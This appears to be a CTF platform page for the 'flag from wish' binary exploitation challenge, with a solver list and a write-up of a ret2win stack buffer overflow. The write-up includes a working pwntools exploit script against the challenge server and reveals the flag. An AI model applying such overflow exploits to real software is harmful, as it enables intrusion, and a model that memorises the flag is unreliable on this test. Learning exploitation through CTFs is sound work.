CyberStudents Wordmark
Back to calendar

flag from wish

Category

Points

Author

Binary exploitation

90

k

kolmus

Solves (93)

1Profile Picture for minipifminipif12/10 3:01 pm
2Profile Picture for tudortudor12/10 3:02 pm
3Profile Picture for _vow__vow_12/10 3:06 pm
4Profile Picture for raul_26raul_2612/10 3:18 pm
5Profile Picture for unpwnblunpwnbl12/10 3:27 pm
6Profile Picture for boomanten10boomanten1012/10 3:38 pm
7Profile Picture for saturn9saturn912/10 3:55 pm
8Profile Picture for krississykrississy12/10 3:55 pm
9Profile Picture for _avyra_avyra12/10 4:06 pm
10Profile Picture for mr_mphmr_mph12/10 4:23 pm
11Profile Picture for pligonsteinpligonstein12/10 4:28 pm
12Profile Picture for Ricker WilkesRicker Wilkes12/10 4:46 pm
13Profile Picture for p.s.yp.s.y12/10 5:22 pm
14Profile Picture for whofulwhoful12/10 6:06 pm
15Profile Picture for .awesomeguy..awesomeguy.12/10 7:01 pm
16Profile Picture for zarnex__zarnex__12/10 9:55 pm
17Profile Picture for eth007eth00712/10 10:58 pm
18Profile Picture for dailybee13.dailybee13.12/11 12:18 am
19Profile Picture for godlyavengergodlyavenger12/11 12:22 am
20Profile Picture for zzunaidd023zzunaidd02312/11 1:31 am
21Profile Picture for silence_silence_12/11 2:04 am
22Profile Picture for heartstollerheartstoller12/11 7:26 am
23Profile Picture for theb4tmitetheb4tmite12/11 7:33 am
24Profile Picture for kr4z31nkr4z31n12/11 11:57 am
25Profile Picture for _4n3s_4n3s12/11 5:18 pm
26Profile Picture for batterseabattersea12/11 6:28 pm
27Profile Picture for booklover997booklover99712/11 11:05 pm
28Profile Picture for ShrelicShrelic12/12 9:36 am
29Profile Picture for dharneesh5555dharneesh555512/12 9:47 am
30Profile Picture for infernosalexinfernosalex12/14 5:00 pm
31Profile Picture for org_benerorg_bener12/15 1:59 am
32Profile Picture for andreicatandreicat12/15 5:52 am
33Profile Picture for nouxianouxia12/15 6:09 am
34Profile Picture for haha_96955haha_9695512/15 12:00 pm
35Profile Picture for hiushieud22hiushieud2212/15 12:04 pm
36Profile Picture for ret2libcret2libc12/15 7:19 pm
37Profile Picture for _self_self12/15 9:48 pm
38Profile Picture for lzutaolzutao12/16 2:02 am
39Profile Picture for test123450604test12345060412/16 4:07 am
40Profile Picture for genggx.genggx.12/16 10:22 am
41Profile Picture for enigma_likes_flagsenigma_likes_flags12/16 11:32 am
42Profile Picture for sleuth123sleuth12312/16 6:19 pm
43Profile Picture for f00varf00var12/17 1:35 am
44Profile Picture for .hackboredzz.hackboredzz12/17 7:10 am
45Profile Picture for gudaumoi12gudaumoi1212/17 10:11 am
46Profile Picture for colonneilcolonneil12/17 10:44 am
47Profile Picture for cc.keycc.key12/17 1:06 pm
48Profile Picture for awdyan_awdyan_12/17 5:10 pm
49Profile Picture for trixaitrixai12/17 5:53 pm
50Profile Picture for elijah5399elijah539912/17 8:45 pm
51Profile Picture for puwanai.spuwanai.s12/17 10:28 pm
52Profile Picture for andreww4364andreww436412/18 3:27 am
53Profile Picture for monstermanyana_47633monstermanyana_4763312/18 3:45 am
54Profile Picture for damian.28damian.2812/18 2:09 pm
55Profile Picture for athawathaw12/18 7:27 pm
56Profile Picture for fzhshzh_163fzhshzh_16312/19 3:50 am
57Profile Picture for vuxnx_91621vuxnx_9162112/19 5:50 am
58Profile Picture for ots3299ots329912/19 6:43 am
59Profile Picture for ryuun1cornryuun1corn12/20 6:45 am
60Profile Picture for jurf3889jurf388912/20 11:10 am
61Profile Picture for 9emperor_84114_452599emperor_84114_4525912/20 12:07 pm
62Profile Picture for c9550c955012/20 12:52 pm
63Profile Picture for naufalardhaninaufalardhani12/20 2:07 pm
64Profile Picture for rex_i_arex_i_a12/21 1:36 pm
65Profile Picture for manu7738manu773812/21 8:40 pm
66Profile Picture for rotzkokowskirotzkokowski12/22 8:40 am
67Profile Picture for mtwiss_32447mtwiss_3244712/22 11:29 am
68Profile Picture for .mindsystem.mindsystem12/22 4:32 pm
69Profile Picture for captainblcaptainbl12/23 7:39 am
70Profile Picture for spectre06872spectre0687212/23 7:47 am
71Profile Picture for obetobet12/23 8:12 am
72Profile Picture for aquarheadaquarhead12/23 3:11 pm
73Profile Picture for iam_the_tea_guyiam_the_tea_guy12/23 3:49 pm
74Profile Picture for re_tiredre_tired12/24 12:27 pm
75Profile Picture for awwliveyetawwliveyet12/25 4:57 am
76Profile Picture for biggamer9000biggamer900012/25 7:41 am
77Profile Picture for fisher_8fisher_812/25 8:44 am
78Profile Picture for mattewastakenmattewastaken12/25 12:16 pm
79Profile Picture for darkitydarkity12/25 12:39 pm
80Profile Picture for tildenjacksontildenjackson12/25 6:21 pm
81Profile Picture for grwnagrwna12/26 1:23 am
82Profile Picture for leyo7leyo712/26 8:59 am
83Profile Picture for tyx2019tyx201912/27 1:33 am
84Profile Picture for fakeaviationistfakeaviationist12/27 3:13 am
85Profile Picture for lcjlylcjly12/27 3:21 am
86Profile Picture for _vga__vga_12/27 1:04 pm
87Profile Picture for 0x0ffset0x0ffset12/28 12:49 am
88Profile Picture for hotikerhotiker12/28 9:15 am
89Profile Picture for hiu_hiu_nekhiu_hiu_nek12/28 10:39 pm
90Profile Picture for wilsonwei_cswilsonwei_cs12/29 1:30 am
91Profile Picture for siddhartha_hdksiddhartha_hdk12/29 4:50 am
92Profile Picture for .jstr_.jstr_12/29 5:08 am
93Profile Picture for wtfpainnwtfpainn12/29 12:59 pm

Description

What is on your wish list this year? Be sure to tell Santa in great detail. He might have an early present or two in store for you!

nc ctf.csd.lol 4003

Attachments

Hint

There are no penalties for viewing hints. Hints are released 12 hours and 24 hours after the challenge releases.

Submit flag

Discuss this challenge with others in #🎄丨advent-of-ctf on our Discord server.

Write-up

zarnex's write-up was selected as the best write-up submitted for this challenge.

View this write-up on GitHub

So from initial glances I can tell that there is a win() function, this means we need to exploit something to get to win(). Also looking at the decompilation we see it reads in 256 bytes (0x100) without bounds checking but var_78 is allocated with a smaller size of 100 bytes (0x64). This means we can overwrite var_78 by sending more than 100 bytes.

In CTF's we commonly call this a ret2win (pronounced ret to win) where the goal is to manipulate the value of RIP (Return Instruction Pointer) by overwriting it, so here is how we need to craft our payload...

  • First Part: Padding to reach the saved return address
  • Second Part: Overwrite the saved return address with the address of win()

But now we need to find the offset for the first parts, Binary ninja has the perfect feature for this!

As you can see, for the main() function the stack entry is at 0x78 which is 120. Now that we have our offset, we can start solving!

Below is the script I used to solve with comments.

from pwn import * # Importing Pwntools, an amazing library for ROP

remote = remote("ctf.csd.lol", 4003) # Specifying our remote

win_addr = 0x4011f6

payload = b"A"*120 # sending the same amount as our offset
payload += p64(win_addr) # p64() "Converts an integer to a 64-bit little-endian representation."
remote.recvuntil("enter your wish") # Waiting until we get the input text saying enter your wish
remote.sendline(payload) # Then sending after it
remote.interactive() # spawning a interactive shell afterwards.

Running it we get...

$ /bin/python3 /home/zarnex/advent_of_ctf/flag_from_wish/solution.py
[+] Opening connection to ctf.csd.lol on port 4003: Done
/home/zarnex/advent_of_ctf/flag_from_wish/solution.py:9: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  remote.recvuntil("enter your wish") # Waiting until we get the input text saying enter your wish
[*] Switching to interactive mode
:
hmm ... I'm not sure I can grant that
maybe try again next year.
[DEBUG] returning to address: 0x4011f6
csd{Br0uGH7_t0_YOU_8y_W15H_D0t_CoM}
[*] Got EOF while reading in interactive
$

Nice, we got the flag! And looking at the debug line, we see it returned to the win() address getting us our flag!

Flag: csd{Br0uGH7_t0_YOU_8y_W15H_D0t_CoM}

Need help with a challenge? Is a challenge broken? DM @ModMail in our Discord server.